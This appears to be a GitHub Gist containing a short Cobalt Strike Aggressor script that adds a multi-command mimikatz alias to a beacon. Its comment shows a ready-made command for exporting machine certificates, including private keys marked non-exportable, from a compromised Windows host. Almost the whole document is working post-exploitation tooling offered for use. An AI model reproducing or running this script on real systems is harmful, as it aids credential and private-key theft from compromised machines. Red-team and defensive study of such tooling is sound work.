Last active
November 13, 2022 13:51
-
-
Save tothi/2809d548f7407de781892c4f840fdee1 to your computer and use it in GitHub Desktop.
multi-command mimikatz functionality in a Cobalt Strike beacon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# multi-command mimikatz in a Cobalt Strike beacon extending the built-in mimikatz functionality | |
# | |
# cmd separator is | | |
# | |
# practical example: export machine certificates (including non-exportable private key :)): | |
# | |
# mmimikatz "crypto::capi|crypto::certificates /systemstore:local_machine /store:my /export" | |
# | |
alias mmimikatz { | |
if (strlen($2) < 512) { | |
bmimikatz($1, replace($2, "\\|", "\n")); | |
} else { | |
blog($1, "Command length should not exceed 512 characters."); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment